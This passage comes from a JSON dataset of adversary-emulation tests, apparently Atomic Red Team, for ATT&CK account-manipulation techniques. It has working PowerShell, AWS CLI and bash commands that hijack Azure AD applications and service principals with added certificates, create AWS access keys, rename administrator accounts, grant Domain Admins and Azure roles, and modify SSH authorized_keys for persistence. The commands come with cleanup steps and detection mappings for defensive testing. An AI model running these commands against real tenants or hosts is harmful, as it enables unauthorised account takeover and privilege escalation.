In case the cleanup command isn't called, it's better to ensure that everything expires after 1 day so it doesn't leave this backdoor open for too long\n$certNotAfter = (Get-Date).AddDays(2)\n$credNotAfter = (Get-Date).AddDays(1)\n$thumb = (New-SelfSignedCertificate -DnsName \"atomicredteam.example.com\" -FriendlyName \"AtomicCert\" -CertStoreLocation \"cert:\\CurrentUser\\My\" -KeyExportPolicy Exportable -Provider \"Microsoft Enhanced RSA and AES Cryptographic Provider\" -NotAfter $certNotAfter).Thumbprint\n$pwd = ConvertTo-SecureString -String \"#{certificate_password}\" -Force -AsPlainText\nExport-PfxCertificate -cert \"cert:\\CurrentUser\\my\\$thumb\" -FilePath \"#{path_to_cert}\\#{service_principal_name}.pfx\" -Password $pwd\n\n$cert = New-Object System.Security.Cryptography.X509Certificates.X509Certificate(\"#{path_to_cert}\\#{service_principal_name}.pfx\", $pwd)\n$keyValue = [System.Convert]::ToBase64String($cert.GetRawCertData())\n\nNew-AzureADServicePrincipalKeyCredential -ObjectId $sp.ObjectId -Type AsymmetricX509Cert -CustomKeyIdentifier \"AtomicTest\" -Usage Verify -Value $keyValue -EndDate $credNotAfter\n\nStart-Sleep -s 30\n$tenant=Get-AzureADTenantDetail\n$auth = Connect-AzureAD -TenantId $tenant.ObjectId -ApplicationId $sp.AppId -CertificateThumbprint $thumb\nWrite-Host \"Application Hijacking worked. 
Logged in successfully as $($auth.Account.Id) of type $($auth.Account.Type)\"\nWrite-Host \"End of Hijacking\"\n", + "cleanup_command": "try {\nImport-Module -Name AzureAD -ErrorAction Ignore\n$PWord = ConvertTo-SecureString -String \"#{password}\" -AsPlainText -Force\n$Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList \"#{username}\", $Pword\nConnect-AzureAD -Credential $Credential -ErrorAction Ignore\n\n$sp = Get-AzureADServicePrincipal -Searchstring \"#{service_principal_name}\"\n$credz = Get-AzureADServicePrincipalKeyCredential -ObjectId $sp.ObjectId\nforeach ($cred in $credz) {\n if ([System.Text.Encoding]::ASCII.GetString($cred.CustomKeyIdentifier) -eq \"AtomicTest\") {\n Remove-AzureADServicePrincipalKeyCredential -ObjectId $sp.ObjectId -KeyId $cred.KeyId\n } \n}\nGet-ChildItem -Path Cert:\\CurrentUser\\My | where { $_.FriendlyName -eq \"AtomicCert\" } | Remove-Item\nrm \"#{path_to_cert}\\#{service_principal_name}.pfx\"\n} catch {}\n", + "name": "powershell", + "elevation_required": false + } + }, + { + "name": "Azure AD Application Hijacking - App Registration", + "auto_generated_guid": "a12b5531-acab-4618-a470-0dafb294a87a", + "description": "Add a certificate to an Application through its App Registration.\nThe certificate can then be used to authenticate as the application and benefit from its rights.\nAn account with high-enough Azure AD privileges is needed, such as Global Administrator or Application Administrator. 
The account authentication must be without MFA.\n", + "supported_platforms": [ + "azure-ad" + ], + "input_arguments": { + "username": { + "description": "Azure AD username", + "type": "String", + "default": "jonh@contoso.com" + }, + "password": { + "description": "Azure AD password", + "type": "String", + "default": "p4sswd" + }, + "application_name": { + "description": "Name of the targeted application", + "type": "String", + "default": "SuperApp" + }, + "certificate_password": { + "description": "Password of the new certificate", + "type": "String", + "default": "Passw0rd" + }, + "path_to_cert": { + "description": "Path of the new certificate, locally stored", + "type": "String", + "default": "$env:TEMP" + } + }, + "dependency_executor_name": "powershell", + "dependencies": [ + { + "description": "AzureAD module must be installed.\n", + "prereq_command": "try {if (Get-InstalledModule -Name AzureAD -ErrorAction SilentlyContinue) {exit 0} else {exit 1}} catch {exit 1}\n", + "get_prereq_command": "Install-Module -Name AzureAD -Force\n" + } + ], + "executor": { + "command": "Import-Module -Name AzureAD\n$PWord = ConvertTo-SecureString -String \"#{password}\" -AsPlainText -Force\n$Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList \"#{username}\", $Pword\nConnect-AzureAD -Credential $Credential\n\n$app = Get-AzureADApplication -Searchstring \"#{application_name}\"\nif ($app -eq $null) { Write-Warning \"Application not found\"; exit }\n$certNotAfter = (Get-Date).AddDays(2)\n$credNotAfter = (Get-Date).AddDays(1)\n$thumb = (New-SelfSignedCertificate -DnsName \"atomicredteam.example.com\" -FriendlyName \"AtomicCert\" -CertStoreLocation \"cert:\\CurrentUser\\My\" -KeyExportPolicy Exportable -Provider \"Microsoft Enhanced RSA and AES Cryptographic Provider\" -NotAfter $certNotAfter).Thumbprint\n$pwd = ConvertTo-SecureString -String \"#{certificate_password}\" -Force -AsPlainText\nExport-PfxCertificate -cert 
\"cert:\\CurrentUser\\my\\$thumb\" -FilePath \"#{path_to_cert}\\#{application_name}.pfx\" -Password $pwd\n\n$cert = New-Object System.Security.Cryptography.X509Certificates.X509Certificate(\"#{path_to_cert}\\#{application_name}.pfx\", $pwd)\n$keyValue = [System.Convert]::ToBase64String($cert.GetRawCertData())\n\nNew-AzureADApplicationKeyCredential -ObjectId $app.ObjectId -Type AsymmetricX509Cert -CustomKeyIdentifier \"AtomicTest\" -Usage Verify -Value $keyValue -EndDate $credNotAfter\n\nStart-Sleep -s 30\n$tenant=Get-AzureADTenantDetail\n$auth = Connect-AzureAD -TenantId $tenant.ObjectId -ApplicationId $app.AppId -CertificateThumbprint $thumb\nWrite-Host \"Application Hijacking worked. Logged in successfully as $($auth.Account.Id) of type $($auth.Account.Type)\"\nWrite-Host \"End of Hijacking\"\n", + "cleanup_command": "try {\nImport-Module -Name AzureAD -ErrorAction Ignore\n$PWord = ConvertTo-SecureString -String \"#{password}\" -AsPlainText -Force\n$Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList \"#{username}\", $Pword\nConnect-AzureAD -Credential $Credential -ErrorAction Ignore\n\n$app = Get-AzureADApplication -Searchstring \"#{application_name}\"\n$credz = Get-AzureADApplicationKeyCredential -ObjectId $app.ObjectId\nforeach ($cred in $credz) {\n if ([System.Text.Encoding]::ASCII.GetString($cred.CustomKeyIdentifier) -eq \"AtomicTest\") {\n Remove-AzureADApplicationKeyCredential -ObjectId $app.ObjectId -KeyId $cred.KeyId\n } \n}\nGet-ChildItem -Path Cert:\\CurrentUser\\My | where { $_.FriendlyName -eq \"AtomicCert\" } | Remove-Item\nrm \"#{path_to_cert}\\#{application_name}.pfx\"\n} catch {}\n", + "name": "powershell", + "elevation_required": false + } + }, + { + "name": "AWS - Create Access Key and Secret Key", + "auto_generated_guid": "8822c3b0-d9f9-4daf-a043-491160a31122", + "description": "Adversaries create their own new access and secret keys to programatically interact with AWS environment, which is already 
compromised\n", + "supported_platforms": [ + "iaas:aws" + ], + "input_arguments": { + "username": { + "description": "Create new AWS access and secret keys for the user", + "type": "String", + "default": "atomicredteam" + } + }, + "dependencies": [ + { + "description": "Check if the user exists.\n", + "prereq_command": "aws iam list-users | grep #{username}\n", + "get_prereq_command": "echo Please run atomic test T1136.003, before running this atomic\n" + } + ], + "executor": { + "command": "aws iam create-access-key --user-name #{username} > $PathToAtomicsFolder/T1098.001/bin/aws_secret.creds\ncd $PathToAtomicsFolder/T1098.001/bin/\n./aws_secret.sh\n", + "cleanup_command": "access_key=`cat $PathToAtomicsFolder/T1098.001/bin/aws_secret.creds| jq -r '.AccessKey.AccessKeyId'`\naws iam delete-access-key --access-key-id $access_key --user-name #{username}\nrm $PathToAtomicsFolder/T1098.001/bin/aws_secret.creds\n", + "name": "sh" + } + } + ] + } + ], + "queries": [], + "possible_detections": [ + { + "data_source": "user account", + "definition": "The representation of a user, device, service or application that access resources within a network environment. It has login capabilities and can be authenticated by an operating system, application or platform.", + "collection_layers": [ + "host", + "cloud", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Containers", + "Google Workspace" + ], + "data_component": "user account modification", + "description": "A user account was modified.", + "source_data_element": "user", + "relationship": "requested modification of", + "target_data_element": "user" + }, + { + "data_source": "user account", + "definition": "The representation of a user, device, service or application that access resources within a network environment. 
It has login capabilities and can be authenticated by an operating system, application or platform.", + "collection_layers": [ + "host", + "cloud", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Containers", + "Google Workspace" + ], + "data_component": "user account modification", + "description": "A user account was modified.", + "source_data_element": "user", + "relationship": "modified", + "target_data_element": "user" + }, + { + "data_source": "user account", + "definition": "The representation of a user, device, service or application that access resources within a network environment. It has login capabilities and can be authenticated by an operating system, application or platform.", + "collection_layers": [ + "host", + "cloud", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Containers", + "Google Workspace" + ], + "data_component": "user account modification", + "description": "A user account was modified.", + "source_data_element": "user", + "relationship": "modified", + "target_data_element": "service principal" + }, + { + "data_source": "user account", + "definition": "The representation of a user, device, service or application that access resources within a network environment. 
It has login capabilities and can be authenticated by an operating system, application or platform.", + "collection_layers": [ + "host", + "cloud", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Containers", + "Google Workspace" + ], + "data_component": "user account modification", + "description": "A user account was modified.", + "source_data_element": "user", + "relationship": "enabled", + "target_data_element": "user" + }, + { + "data_source": "user account", + "definition": "The representation of a user, device, service or application that access resources within a network environment. It has login capabilities and can be authenticated by an operating system, application or platform.", + "collection_layers": [ + "host", + "cloud", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Containers", + "Google Workspace" + ], + "data_component": "user account modification", + "description": "A user account was modified.", + "source_data_element": "user", + "relationship": "disabled", + "target_data_element": "user" + }, + { + "data_source": "user account", + "definition": "The representation of a user, device, service or application that access resources within a network environment. 
It has login capabilities and can be authenticated by an operating system, application or platform.", + "collection_layers": [ + "host", + "cloud", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Containers", + "Google Workspace" + ], + "data_component": "user account modification", + "description": "A user account was modified.", + "source_data_element": "user", + "relationship": "locked", + "target_data_element": "user" + }, + { + "data_source": "user account", + "definition": "The representation of a user, device, service or application that access resources within a network environment. It has login capabilities and can be authenticated by an operating system, application or platform.", + "collection_layers": [ + "host", + "cloud", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Containers", + "Google Workspace" + ], + "data_component": "user account modification", + "description": "A user account was modified.", + "source_data_element": "user", + "relationship": "unlocked", + "target_data_element": "user" + }, + { + "data_source": "user account", + "definition": "The representation of a user, device, service or application that access resources within a network environment. 
It has login capabilities and can be authenticated by an operating system, application or platform.", + "collection_layers": [ + "host", + "cloud", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Containers", + "Google Workspace" + ], + "data_component": "user account modification", + "description": "A user account was modified.", + "source_data_element": "user", + "relationship": "granted access to", + "target_data_element": "user" + }, + { + "data_source": "user account", + "definition": "The representation of a user, device, service or application that access resources within a network environment. It has login capabilities and can be authenticated by an operating system, application or platform.", + "collection_layers": [ + "host", + "cloud", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Containers", + "Google Workspace" + ], + "data_component": "user account modification", + "description": "A user account was modified.", + "source_data_element": "user", + "relationship": "removed access from", + "target_data_element": "user" + }, + { + "data_source": "active directory", + "definition": "Information associated with the Active Directory service or objects (Such as a user, a group, or a workstation) and activity around them.", + "collection_layers": [ + "host", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Azure AD" + ], + "data_component": "active directory object modification", + "description": "An active directory service or object was modified.", + "source_data_element": "user", + "relationship": "modified", + "target_data_element": "ad object" + } + ], + "external_reference": [ + [ + "https://docs.microsoft.com/en-us/windows/security/identity-protection/access-control/security-principals" + ], + [ + 
"https://docs.microsoft.com/en-us/windows-server/identity/ad-ds/ad-ds-getting-started" + ] + ] + }, + { + "technique_id": "T1098.004", + "command_list": [ + "if [ -f ~/.ssh/authorized_keys ]; then ssh_authorized_keys=$(cat ~/.ssh/authorized_keys); echo $ssh_authorized_keys > ~/.ssh/authorized_keys; fi;\n" + ], + "commands": [ + { + "command": "if [ -f ~/.ssh/authorized_keys ]; then ssh_authorized_keys=$(cat ~/.ssh/authorized_keys); echo $ssh_authorized_keys > ~/.ssh/authorized_keys; fi;\n", + "source": "atomics/T1098.004/T1098.004.yaml", + "name": "Atomic Red Team Test - SSH Authorized Keys" + } + ], + "parsed_datasets": [ + { + "attack_technique": "T1098.004", + "display_name": "SSH Authorized Keys", + "atomic_tests": [ + { + "name": "Modify SSH Authorized Keys", + "auto_generated_guid": "342cc723-127c-4d3a-8292-9c0c6b4ecadc", + "description": "Modify contents of /.ssh/authorized_keys to maintain persistence on victim host. \nIf the user is able to save the same contents in the authorized_keys file, it shows user can modify the file.\n", + "supported_platforms": [ + "macos", + "linux" + ], + "executor": { + "name": "bash", + "elevation_required": false, + "command": "if [ -f ~/.ssh/authorized_keys ]; then ssh_authorized_keys=$(cat ~/.ssh/authorized_keys); echo $ssh_authorized_keys > ~/.ssh/authorized_keys; fi;\n", + "cleanup_command": "unset ssh_authorized_keys\n" + } + } + ] + } + ], + "queries": [], + "possible_detections": [ + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "user", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are 
being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "thread" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "user", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file 
systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file modification", + "description": "A file was modified.", + "source_data_element": "process", + "relationship": "modified", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file modification", + "description": "A file was modified.", + "source_data_element": "user", + "relationship": "modified", + "target_data_element": "file" + } + ], + "external_reference": [ + [ + "https://docs.microsoft.com/en-us/windows/win32/procthread/processes-and-threads" + ], + [ + "https://tools.ietf.org/id/draft-ietf-opsawg-tacacs-07.html#rfc.section.7.2", + "https://tools.ietf.org/html/rfc2866" + ], + [ + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-management", + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-streams", + "https://docs.microsoft.com/en-us/troubleshoot/windows-client/backup-and-storage/fat-hpfs-and-ntfs-file-systems" + ] + ] + }, + { + "technique_id": "T1098", + "command_list": [ + "$x = Get-Random -Minimum 2 -Maximum 9999\n$y = Get-Random -Minimum 2 -Maximum 9999\n$z = Get-Random -Minimum 2 -Maximum 9999\n$w = Get-Random -Minimum 2 -Maximum 9999\nWrite-Host HaHa_$x$y$z\n\n$fmm = Get-LocalGroupMember -Group Administrators |?{ $_.ObjectClass -match \"User\" -and 
$_.PrincipalSource -match \"Local\"} | Select Name\n\nforeach($member in $fmm) {\n if($member -like \"*Administrator*\") {\n $account = $member.Name -replace \".+\\\\\\\",\"\" # strip computername\\\n $originalDescription = (Get-LocalUser -Name $account).Description\n Set-LocalUser -Name $account -Description \"atr:$account;$originalDescription\".Substring(0,48) # Keep original name in description\n Rename-LocalUser -Name $account -NewName \"HaHa_$x$y$z\" # Required due to length limitation\n Write-Host \"Successfully Renamed $account Account on \" $Env:COMPUTERNAME\n }\n }\n", + "$x = Get-Random -Minimum 2 -Maximum 99\n$y = Get-Random -Minimum 2 -Maximum 99\n$z = Get-Random -Minimum 2 -Maximum 99\n$w = Get-Random -Minimum 2 -Maximum 99\n\nImport-Module ActiveDirectory\n$account = \"atr--$x$y$z\"\nNew-ADUser -Name $account -GivenName \"Test\" -DisplayName $account -SamAccountName $account -Surname $account -Enabled:$False #{create_args}\nAdd-ADGroupMember \"#{group}\" $account\n", + "$x = Get-Random -Minimum 2 -Maximum 99\n$y = Get-Random -Minimum 2 -Maximum 99\n$z = Get-Random -Minimum 2 -Maximum 99\n$w = Get-Random -Minimum 2 -Maximum 99\n\nImport-Module ActiveDirectory\n$account = \"#{account_prefix}-$x$y$z\"\nNew-ADUser -Name $account -GivenName \"Test\" -DisplayName $account -SamAccountName $account -Surname $account -Enabled:$False #{create_args}\nAdd-ADGroupMember \"Domain Admins\" $account\n", + "$x = Get-Random -Minimum 2 -Maximum 99\n$y = Get-Random -Minimum 2 -Maximum 99\n$z = Get-Random -Minimum 2 -Maximum 99\n$w = Get-Random -Minimum 2 -Maximum 99\n\nImport-Module ActiveDirectory\n$account = \"#{account_prefix}-$x$y$z\"\nNew-ADUser -Name $account -GivenName \"Test\" -DisplayName $account -SamAccountName $account -Surname $account -Enabled:$False \nAdd-ADGroupMember \"#{group}\" $account\n", + "aws iam create-group --group-name atomicredteam\naws iam add-user-to-group --user-name atomicredteam --group-name atomicredteam\n", + "Import-Module -Name 
AzureAD\n$PWord = ConvertTo-SecureString -String \"#{password}\" -AsPlainText -Force\n$Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList \"jonh@contoso.com\", $Pword\nConnect-AzureAD -Credential $Credential\n\n$user = Get-AzureADUser | where-object {$_.DisplayName -eq \"#{user_principal_name}\"}\nif ($user -eq $null) { Write-Warning \"User not found\"; exit }\n$role = Get-AzureADDirectoryRole | where-object {$_.DisplayName -eq \"#{role_name}\"}\nif ($role -eq $null) { Write-Warning \"Role not found\"; exit }\nAdd-AzureADDirectoryRoleMember -ObjectId $role.ObjectId -RefObjectId $user.ObjectId\nWrite-Host \"User $($user.DisplayName) was added to $($role.DisplayName) role\"\n", + "Import-Module -Name AzureAD\n$PWord = ConvertTo-SecureString -String \"p4sswd\" -AsPlainText -Force\n$Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList \"#{username}\", $Pword\nConnect-AzureAD -Credential $Credential\n\n$user = Get-AzureADUser | where-object {$_.DisplayName -eq \"#{user_principal_name}\"}\nif ($user -eq $null) { Write-Warning \"User not found\"; exit }\n$role = Get-AzureADDirectoryRole | where-object {$_.DisplayName -eq \"#{role_name}\"}\nif ($role -eq $null) { Write-Warning \"Role not found\"; exit }\nAdd-AzureADDirectoryRoleMember -ObjectId $role.ObjectId -RefObjectId $user.ObjectId\nWrite-Host \"User $($user.DisplayName) was added to $($role.DisplayName) role\"\n", + "Import-Module -Name AzureAD\n$PWord = ConvertTo-SecureString -String \"#{password}\" -AsPlainText -Force\n$Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList \"#{username}\", $Pword\nConnect-AzureAD -Credential $Credential\n\n$user = Get-AzureADUser | where-object {$_.DisplayName -eq \"SuperUser\"}\nif ($user -eq $null) { Write-Warning \"User not found\"; exit }\n$role = Get-AzureADDirectoryRole | where-object {$_.DisplayName -eq \"#{role_name}\"}\nif ($role -eq $null) { Write-Warning \"Role 
not found\"; exit }\nAdd-AzureADDirectoryRoleMember -ObjectId $role.ObjectId -RefObjectId $user.ObjectId\nWrite-Host \"User $($user.DisplayName) was added to $($role.DisplayName) role\"\n", + "Import-Module -Name AzureAD\n$PWord = ConvertTo-SecureString -String \"#{password}\" -AsPlainText -Force\n$Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList \"#{username}\", $Pword\nConnect-AzureAD -Credential $Credential\n\n$user = Get-AzureADUser | where-object {$_.DisplayName -eq \"#{user_principal_name}\"}\nif ($user -eq $null) { Write-Warning \"User not found\"; exit }\n$role = Get-AzureADDirectoryRole | where-object {$_.DisplayName -eq \"Global Reader\"}\nif ($role -eq $null) { Write-Warning \"Role not found\"; exit }\nAdd-AzureADDirectoryRoleMember -ObjectId $role.ObjectId -RefObjectId $user.ObjectId\nWrite-Host \"User $($user.DisplayName) was added to $($role.DisplayName) role\"\n", + "Import-Module -Name AzureAD\n$PWord = ConvertTo-SecureString -String \"#{password}\" -AsPlainText -Force\n$Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList \"jonh@contoso.com\", $Pword\nConnect-AzureAD -Credential $Credential\n\n$sp = Get-AzureADServicePrincipal | where-object {$_.DisplayName -eq \"#{service_principal_name}\"}\nif ($sp -eq $null) { Write-Warning \"Service Principal not found\"; exit }\n$role = Get-AzureADDirectoryRole | where-object {$_.DisplayName -eq \"#{role_name}\"}\nif ($role -eq $null) { Write-Warning \"Role not found\"; exit }\nAdd-AzureADDirectoryRoleMember -ObjectId $role.ObjectId -RefObjectId $sp.ObjectId\nWrite-Host \"Service Principal $($sp.DisplayName) was added to $($role.DisplayName)\"\n", + "Import-Module -Name AzureAD\n$PWord = ConvertTo-SecureString -String \"p4sswd\" -AsPlainText -Force\n$Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList \"#{username}\", $Pword\nConnect-AzureAD -Credential $Credential\n\n$sp = 
Get-AzureADServicePrincipal | where-object {$_.DisplayName -eq \"#{service_principal_name}\"}\nif ($sp -eq $null) { Write-Warning \"Service Principal not found\"; exit }\n$role = Get-AzureADDirectoryRole | where-object {$_.DisplayName -eq \"#{role_name}\"}\nif ($role -eq $null) { Write-Warning \"Role not found\"; exit }\nAdd-AzureADDirectoryRoleMember -ObjectId $role.ObjectId -RefObjectId $sp.ObjectId\nWrite-Host \"Service Principal $($sp.DisplayName) was added to $($role.DisplayName)\"\n", + "Import-Module -Name AzureAD\n$PWord = ConvertTo-SecureString -String \"#{password}\" -AsPlainText -Force\n$Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList \"#{username}\", $Pword\nConnect-AzureAD -Credential $Credential\n\n$sp = Get-AzureADServicePrincipal | where-object {$_.DisplayName -eq \"SuperSP\"}\nif ($sp -eq $null) { Write-Warning \"Service Principal not found\"; exit }\n$role = Get-AzureADDirectoryRole | where-object {$_.DisplayName -eq \"#{role_name}\"}\nif ($role -eq $null) { Write-Warning \"Role not found\"; exit }\nAdd-AzureADDirectoryRoleMember -ObjectId $role.ObjectId -RefObjectId $sp.ObjectId\nWrite-Host \"Service Principal $($sp.DisplayName) was added to $($role.DisplayName)\"\n", + "Import-Module -Name AzureAD\n$PWord = ConvertTo-SecureString -String \"#{password}\" -AsPlainText -Force\n$Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList \"#{username}\", $Pword\nConnect-AzureAD -Credential $Credential\n\n$sp = Get-AzureADServicePrincipal | where-object {$_.DisplayName -eq \"#{service_principal_name}\"}\nif ($sp -eq $null) { Write-Warning \"Service Principal not found\"; exit }\n$role = Get-AzureADDirectoryRole | where-object {$_.DisplayName -eq \"Global Reader\"}\nif ($role -eq $null) { Write-Warning \"Role not found\"; exit }\nAdd-AzureADDirectoryRoleMember -ObjectId $role.ObjectId -RefObjectId $sp.ObjectId\nWrite-Host \"Service Principal $($sp.DisplayName) was added to 
$($role.DisplayName)\"\n", + "Import-Module -Name Az.Resources\n$PWord = ConvertTo-SecureString -String \"#{password}\" -AsPlainText -Force\n$Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList \"jonh@contoso.com\", $Pword\nConnect-AzAccount -Credential $Credential\n\n$user = Get-AzADUser | where-object {$_.DisplayName -eq \"#{user_principal_name}\"}\nif ($user -eq $null) { Write-Warning \"User not found\"; exit }\n$subscription = Get-AzSubscription | where-object {$_.Name -eq \"#{subscription}\"}\nif ($subscription -eq $null) { Write-Warning \"Subscription not found\"; exit }\n$role = Get-AzRoleDefinition | where-object {$_.Name -eq \"#{role_name}\"}\nif ($role -eq $null) { Write-Warning \"Role not found\"; exit }\n\nNew-AzRoleAssignment -ObjectId $user.id -RoleDefinitionId $role.id -Scope /subscriptions/$subscription\nWrite-Host \"User $($user.DisplayName) was added to $($role.Name) role in subscriptions $($subscriptions.Name)\"\n", + "Import-Module -Name Az.Resources\n$PWord = ConvertTo-SecureString -String \"p4sswd\" -AsPlainText -Force\n$Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList \"#{username}\", $Pword\nConnect-AzAccount -Credential $Credential\n\n$user = Get-AzADUser | where-object {$_.DisplayName -eq \"#{user_principal_name}\"}\nif ($user -eq $null) { Write-Warning \"User not found\"; exit }\n$subscription = Get-AzSubscription | where-object {$_.Name -eq \"#{subscription}\"}\nif ($subscription -eq $null) { Write-Warning \"Subscription not found\"; exit }\n$role = Get-AzRoleDefinition | where-object {$_.Name -eq \"#{role_name}\"}\nif ($role -eq $null) { Write-Warning \"Role not found\"; exit }\n\nNew-AzRoleAssignment -ObjectId $user.id -RoleDefinitionId $role.id -Scope /subscriptions/$subscription\nWrite-Host \"User $($user.DisplayName) was added to $($role.Name) role in subscriptions $($subscriptions.Name)\"\n", + "Import-Module -Name Az.Resources\n$PWord = 
ConvertTo-SecureString -String \"#{password}\" -AsPlainText -Force\n$Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList \"#{username}\", $Pword\nConnect-AzAccount -Credential $Credential\n\n$user = Get-AzADUser | where-object {$_.DisplayName -eq \"SuperUser\"}\nif ($user -eq $null) { Write-Warning \"User not found\"; exit }\n$subscription = Get-AzSubscription | where-object {$_.Name -eq \"#{subscription}\"}\nif ($subscription -eq $null) { Write-Warning \"Subscription not found\"; exit }\n$role = Get-AzRoleDefinition | where-object {$_.Name -eq \"#{role_name}\"}\nif ($role -eq $null) { Write-Warning \"Role not found\"; exit }\n\nNew-AzRoleAssignment -ObjectId $user.id -RoleDefinitionId $role.id -Scope /subscriptions/$subscription\nWrite-Host \"User $($user.DisplayName) was added to $($role.Name) role in subscriptions $($subscriptions.Name)\"\n", + "Import-Module -Name Az.Resources\n$PWord = ConvertTo-SecureString -String \"#{password}\" -AsPlainText -Force\n$Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList \"#{username}\", $Pword\nConnect-AzAccount -Credential $Credential\n\n$user = Get-AzADUser | where-object {$_.DisplayName -eq \"#{user_principal_name}\"}\nif ($user -eq $null) { Write-Warning \"User not found\"; exit }\n$subscription = Get-AzSubscription | where-object {$_.Name -eq \"#{subscription}\"}\nif ($subscription -eq $null) { Write-Warning \"Subscription not found\"; exit }\n$role = Get-AzRoleDefinition | where-object {$_.Name -eq \"Reader\"}\nif ($role -eq $null) { Write-Warning \"Role not found\"; exit }\n\nNew-AzRoleAssignment -ObjectId $user.id -RoleDefinitionId $role.id -Scope /subscriptions/$subscription\nWrite-Host \"User $($user.DisplayName) was added to $($role.Name) role in subscriptions $($subscriptions.Name)\"\n", + "Import-Module -Name Az.Resources\n$PWord = ConvertTo-SecureString -String \"#{password}\" -AsPlainText -Force\n$Credential = New-Object -TypeName 
System.Management.Automation.PSCredential -ArgumentList \"#{username}\", $Pword\nConnect-AzAccount -Credential $Credential\n\n$user = Get-AzADUser | where-object {$_.DisplayName -eq \"#{user_principal_name}\"}\nif ($user -eq $null) { Write-Warning \"User not found\"; exit }\n$subscription = Get-AzSubscription | where-object {$_.Name -eq \"Azure subscription 1\"}\nif ($subscription -eq $null) { Write-Warning \"Subscription not found\"; exit }\n$role = Get-AzRoleDefinition | where-object {$_.Name -eq \"#{role_name}\"}\nif ($role -eq $null) { Write-Warning \"Role not found\"; exit }\n\nNew-AzRoleAssignment -ObjectId $user.id -RoleDefinitionId $role.id -Scope /subscriptions/$subscription\nWrite-Host \"User $($user.DisplayName) was added to $($role.Name) role in subscriptions $($subscriptions.Name)\"\n", + "Import-Module -Name Az.Resources\n$PWord = ConvertTo-SecureString -String \"#{password}\" -AsPlainText -Force\n$Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList \"jonh@contoso.com\", $Pword\nConnect-AzAccount -Credential $Credential\n\n$sp = Get-AzADServicePrincipal | where-object {$_.DisplayName -eq \"#{service_principal_name}\"}\nif ($sp -eq $null) { Write-Warning \"Service Principal not found\"; exit }\n$subscription = Get-AzSubscription | where-object {$_.Name -eq \"#{subscription}\"} \nif ($subscription -eq $null) { Write-Warning \"Subscription not found\"; exit }\n$role = Get-AzRoleDefinition | where-object {$_.Name -eq \"#{role_name}\"}\nif ($role -eq $null) { Write-Warning \"Role not found\"; exit }\n\nNew-AzRoleAssignment 